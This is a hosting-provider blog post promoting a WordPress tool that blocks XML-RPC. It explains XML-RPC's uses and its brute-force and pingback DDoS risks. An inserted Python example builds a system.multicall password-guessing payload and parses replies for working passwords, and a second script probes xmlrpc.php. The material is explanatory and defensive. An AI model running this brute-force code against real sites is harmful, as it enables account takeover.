Enhance Hosting Security For WordPress Sites Automatically With New Block XMLRPC Tool


If hardening your clients’ WordPress hosting without lifting a finger sounds great, you’re going to love Block XML-RPC … our newest weapon against XML-RPC attacks!

Block XML-RPC … find out what it means to me!

Since its inception, WordPress has allowed users to interact remotely with their sites using a built-in feature called XML-RPC. This is not only wonderful for smartphone users who want to blog on the go … but hackers too!

In this article, we’ll cover everything you need to know about XML-RPC and show you how to easily and automatically protect WordPress sites hosted with WPMU DEV from hackers exploiting XML-RPC vulnerabilities using our latest hosting security tool.

We’ll also show you how to protect WordPress sites hosted elsewhere.

Let’s jump right in …

What Is XML-RPC?

XML-RPC is a remote procedure call (RPC) protocol that uses XML to encode its calls and HTTP as a transport mechanism.

In simple and practical terms, XML-RPC is used for enabling external applications to interact with your WordPress site. This includes actions like posting content, fetching posts, and managing comments remotely, without using the WordPress web interface.

WordPress supports XML-RPC through a file called xmlrpc.php, found in the root directory of every WordPress install. XML-RPC support actually predates WordPress itself: it was inherited from b2/cafelog, the project WordPress was forked from.

The file xmlrpc.php is found in every install of WP.

You can learn more about XML-RPC and WordPress on this post: XML-RPC and Why It’s Time to Remove it for WordPress Security.

What Is XML-RPC Used For?

XML-RPC lets you manage a WordPress site from somewhere other than its admin dashboard. It provides remote content management and integration with third-party applications, and it streamlines running sites without logging in to the web interface.

WordPress users can benefit from using XML-RPC in areas like:

  • Mobile Blogging: Publish posts, edit pages, and upload media files remotely using the WordPress mobile app or other mobile apps.
  • Integration with Desktop Blogging Clients: Applications like Windows Live Writer or MarsEdit allow users to write and publish content from their desktops.
  • Integration with Services: Connect to automation services like IFTTT.
  • Remote Management Tools: Enable the management of multiple WordPress sites from a single dashboard.
  • Trackbacks and Pingbacks: Let other sites notify yours when they link to it (pingbacks are delivered through the XML-RPC method pingback.ping).

XML-RPC has lost ground to newer APIs built on standards like REST or GraphQL (WordPress itself ships a REST API), and PHP 8.0 unbundled its xmlrpc extension into PECL. That last change does not affect WordPress, which ships its own XML-RPC implementation (the bundled IXR library and class-wp-xmlrpc-server.php), and XML-RPC remains widely used with WordPress because so many existing clients and integrations depend on it.

XML-RPC and WordPress Security

If you are using the WordPress mobile app, want to make connections to services like IFTTT, or want to access and publish to your blog remotely, then you need XML-RPC enabled. Otherwise it’s just another portal for hackers to target and exploit.

Pros and Cons of Using XML-RPC

The pros of using XML-RPC are mostly convenience and efficiency.

Though most applications can use the WordPress REST API instead of XML-RPC, some still require access to xmlrpc.php, either because they were built before the REST API existed or to stay compatible with older WordPress versions that are still in use.

It’s important, however, to know the cons of using XML-RPC.

Basically, xmlrpc.php is a legacy interface, reachable by anyone on the internet, whose design exposes several well-known attack vectors.

These include:

  • Security Risk: XML-RPC can be abused for large scale brute force attacks. Any method that takes credentials (wp.getUsersBlogs, for example) doubles as a login check, and by wrapping many such calls in a single system.multicall request an attacker can test thousands of password guesses with one HTTP request, sidestepping protections that only watch wp-login.php. Since WordPress 4.4, core refuses further authenticated calls in the same multicall once one of them fails, which blunts the amplification, but the endpoint still accepts unlimited requests and every request still costs a password check.
  • Pingback Abuse (DDoS): The pingback.ping method makes your site fetch an attacker-supplied URL, so attackers can turn thousands of unsuspecting WordPress sites into a reflected DDoS botnet against a target domain (and use the same call to probe hosts your server can reach). The flood of outbound requests can also slow down or crash your own site.
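As an added example (not code from the original article or from the Block XML-RPC tool), here is how the system.multicall brute-force payload described above is assembled with Python’s standard xmlrpc.client and how the attacker reads the reply. wp.getUsersBlogs is a real WordPress method that needs nothing but a username and password; the password list and both server replies are constructed inline, and nothing is sent over the network.

```python
"""Added example: build a system.multicall brute-force payload and read the
reply.  Constructed data only; nothing is transmitted anywhere."""
import xmlrpc.client

# Constructed wp.getUsersBlogs result, in the shape WordPress returns.
WP_BLOG = {"blogid": "1", "blogName": "demo", "isAdmin": True,
           "url": "http://example.test/",
           "xmlrpc": "http://example.test/xmlrpc.php"}


def build_multicall(username, passwords):
    """Wrap one wp.getUsersBlogs call per candidate password in a single
    system.multicall request.  A non-fault result means the credential works."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]}
             for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def attempts_in(body):
    """Count how many login attempts one request body carries; this is the
    amplification factor a defender should worry about."""
    (calls,), method = xmlrpc.client.loads(body)
    return len(calls) if method == "system.multicall" else 1


def hits_from(response_body, passwords):
    """Map each multicall result back to the password that produced it and
    return the passwords whose call did not come back as a fault struct."""
    (results,), _ = xmlrpc.client.loads(response_body)
    hits = []
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue              # {'faultCode': 403, 'faultString': ...}
        hits.append(pw)           # [[...blogs...]] means the login succeeded
    return hits


def fake_response(verdicts):
    """Constructed server reply: one entry per call, True -> success array,
    False -> the fault struct WordPress returns for a bad login."""
    results = []
    for ok in verdicts:
        if ok:
            results.append([[WP_BLOG]])   # each success is a one-element array
        else:
            results.append({"faultCode": 403,
                            "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True)


PASSWORDS = ["admin", "password", "letmein", "Summer2023!"]   # constructed
# Pre-4.4 behaviour: every guess is checked, and the third one is right.
LEGACY = fake_response([False, False, True, False])
# WordPress 4.4+: after the first failure the rest of the request is refused,
# so even the correct guess comes back as a failure.
HARDENED = fake_response([False, False, False, False])

if __name__ == "__main__":
    body = build_multicall("admin", PASSWORDS)
    print(f"one POST carries {attempts_in(body)} login attempts")
    print("legacy server hits:", hits_from(LEGACY, PASSWORDS))
    print("4.4+ server hits:  ", hits_from(HARDENED, PASSWORDS))
```

The same shape is what a defender keys on: a POST to xmlrpc.php whose body contains system.multicall wrapped around many credential-bearing calls. Note that the hardened server still performed one real password check per request, so a high rate of such requests remains a brute-force attempt even though no single request can test more than one guess.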

How to Check if XML-RPC is Enabled/Disabled on WordPress Sites

You can use an XML-RPC validation tool to check whether your WordPress site has XML-RPC enabled or disabled.

A validation tool like xmlrpc.blog lets you easily check whether XML-RPC is enabled on your site.

Enter your URL into the Address field and click the Check button.
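If you would rather run the check yourself, here is an added example (not part of the original article or of any validation service) that does what such a tool does: POST a parameterless system.listMethods call to xmlrpc.php and classify the reply. The live request lives behind __main__; the classifier is exercised on constructed replies, and the fault message used is the string WordPress core returns when the xmlrpc_enabled filter disables authenticated methods, used here only as a sample fault.

```python
"""Added example: probe xmlrpc.php by POSTing system.listMethods and
interpreting the reply.  Sample replies are constructed, not captured."""
import urllib.error
import urllib.request
import xmlrpc.client
from xml.parsers.expat import ExpatError

# Request body: system.listMethods takes no parameters and needs no login,
# so a live endpoint always answers it with an array of method names.
LIST_METHODS = xmlrpc.client.dumps((), methodname="system.listMethods")


def interpret(status, body):
    """Classify one HTTP response from xmlrpc.php.

    Returns one of:
      ("enabled", [method names])   a real XML-RPC server answered
      ("fault", code, message)      the server answered with an XML-RPC fault
      ("blocked", status)           a non-200 status from the server or a WAF
      ("unexpected", status)        200, but the body is not XML-RPC at all
    """
    if status != 200:
        return ("blocked", status)
    try:
        (methods,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return ("fault", fault.faultCode, fault.faultString)
    except (xmlrpc.client.ResponseError, ExpatError):
        return ("unexpected", status)    # e.g. an HTML block page served as 200
    return ("enabled", sorted(methods))


def probe(url, timeout=10):
    """POST system.listMethods to url (e.g. https://example.test/xmlrpc.php)."""
    req = urllib.request.Request(
        url, data=LIST_METHODS.encode(), method="POST",
        headers={"Content-Type": "text/xml", "User-Agent": "xmlrpc-probe/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return interpret(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:          # 403/404/405 land here
        return interpret(err.code, err.read().decode("utf-8", "replace"))


# Constructed replies, not captured from any real site.
ENABLED = xmlrpc.client.dumps(
    (["system.listMethods", "system.multicall", "pingback.ping",
      "wp.getUsersBlogs", "wp.getPosts"],), methodresponse=True)
FAULT = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."))
BLOCK_PAGE = "<html><body><h1>403 Forbidden</h1></body></html>"

if __name__ == "__main__":
    print(interpret(200, ENABLED))
    print(interpret(200, FAULT))
    print(interpret(403, BLOCK_PAGE))
    print(interpret(200, BLOCK_PAGE))
```

When the result is "enabled", the method list tells you what is actually exposed: system.multicall and pingback.ping in that list mean both attack vectors discussed above are reachable. A quicker manual sanity check is a plain GET of xmlrpc.php in a browser, which a live WordPress endpoint answers with the text "XML-RPC server accepts POST requests only."; a blocked endpoint returns an error page instead.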